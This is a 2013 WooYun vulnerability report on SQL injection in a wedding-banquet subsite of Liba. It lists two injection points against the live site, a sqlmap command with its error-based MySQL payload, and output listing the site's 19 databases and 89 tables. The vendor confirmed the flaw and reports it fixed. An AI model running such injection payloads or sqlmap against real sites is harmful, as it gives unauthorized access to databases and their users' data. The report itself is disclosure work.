当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032114

漏洞标题:篱笆网旗下某分站SQL注入漏洞

相关厂商:篱笆网

漏洞作者: lucky

提交时间:2013-07-24 17:23

修复时间:2013-09-07 17:24

公开时间:2013-09-07 17:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-24: 细节已通知厂商并且等待厂商处理中
2013-07-24: 厂商已经确认,细节仅向厂商公开
2013-08-03: 细节向核心白帽子及相关领域专家公开
2013-08-13: 细节向普通白帽子公开
2013-08-23: 细节向实习白帽子公开
2013-09-07: 细节向公众公开

简要描述:

详细说明:

天下喜宴网
http://www.tianxiaxiyan.com


注入点1:http://www.tianxiaxiyan.com/index.php/feast/shop_list/money/%5C.html


1.PNG


注入点2:
POST /index.php/feast/search.html HTTP/1.1
Host: www.tianxiaxiyan.com
keywords=%c7%eb%ca%e4%c8%eb%be%c6%b5%ea%c3%fb%b3%c6...&page=%5c


。。。。

注入点:
./sqlmap.py -u "http://www.tianxiaxiyan.com/index.php/feast/search.html" --data "keywords=1" --dbs
Place: POST
Parameter: keywords
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: keywords=1' AND (SELECT 2675 FROM(SELECT COUNT(*),CONCAT(0x3a6f656c3a,(SELECT (CASE WHEN (2675=2675) THEN 1 ELSE 0 END)),0x3a6b6f793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qooG'='qooG
---
[03:46:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.8
back-end DBMS: MySQL 5.0
available databases [19]:
[*] ad_cheat
[*] bj_marry
[*] cpo
[*] feast
[*] gbb
[*] iliba
[*] import
[*] information_schema
[*] lucky
[*] marry
[*] marry8
[*] marry_count
[*] marry_nihao
[*] marry_search
[*] marry_xiyan
[*] mysql
[*] new_marry
[*] shopping
[*] test
Database: marry
[89 tables]
+---------------------------------+
| ALBUM_SORT_DES                  |
| ALBUM_SORT_NAME                 |
| AL_ALBUM                        |
| AL_ALBUM_DIR                    |
| AL_DOWNLOAD_WORD_COUNT          |
| APPLY                           |
| APPLY_08new                     |
| BULLETIN                        |
| BULLETIN_SHOP                   |
| CHARGE_RETURN_MONEY             |
| CHARGE_RETURN_PERCENT           |
| FEAST_ALBUM                     |
| FEAST_ALBUM_DIR                 |
| FEAST_ALBUM_SORT                |
| FEAST_APPLY                     |
| FEAST_SHOP                      |
| FEAST_SHOP_DISH_info            |
| FEAST_SHOP_case                 |
| FEAST_SHOP_log                  |
| FEAST_SHOP_type                 |
| FEAST_TRANSFER                  |
| FILE_LINK                       |
| F_B                             |
| ORDER_CHECKOUT                  |
| ORDER_DATE                      |
| ORDER_INFO                      |
| ORDER_INFO_bak                  |
| ORDER_NOTE                      |
| SALES_PROMOTION                 |
| SHOP                            |
| SHOP_ALBUM                      |
| SHOP_ALBUM_DIR                  |
| SHOP_ALBUM_SORT                 |
| SHOP_BAK                        |
| SHOP_CASE                       |
| SHOP_CASE_DIR                   |
| SHOP_COLLECT                    |
| SHOP_DAY                        |
| SHOP_INFO                       |
| SHOP_MONEY                      |
| SHOP_MONTH                      |
| SHOP_ORDER_DAILY                |
| SHOP_ORDER_DATE                 |
| SHOP_PAY                        |
| SHOP_QA                         |
| SHOP_RECOMMEND                  |
| SHOP_REQUIRE                    |
| SHOP_WEEK                       |
| SHOP_month_reckoning            |
| SORT                            |
| activity_order                  |
| activity_order_id               |
| beginwell_submit_order_ok       |
| employee_activity               |
| feast_bless                     |
| feast_group                     |
| feast_group_number              |
| feast_hall_book                 |
| feast_hall_hotday               |
| feast_hall_info                 |
| feast_order_autofax             |
| feast_order_call_back_log       |
| feast_order_change_log          |
| feast_order_date                |
| feast_order_info                |
| feast_shop_qa                   |
| feast_update_cent_log           |
| hotdeal2006_count               |
| hotdeal2006_submit_order_cancel |
| hotdeal2006_submit_order_ok     |
| hotdeal2006_submit_order_ok_bak |
| import_activity_order           |
| marry_shoot_article             |
| page_view                       |
| party_070616                    |
| party_info                      |
| shop_edit                       |
| shop_editable_field             |
| shop_manager_refer              |
| tmp_class_cust_marry            |
| vote_info                       |
| vote_liba_bride                 |
| vote_liba_bride_member          |
| vote_option_info                |
| vote_user_info                  |
| wedding_sign                    |
| work_record                     |
| work_record_omit                |
| z_signup_user                   |
+---------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-07-24 17:31

厂商回复:

已修复

最新状态:

暂无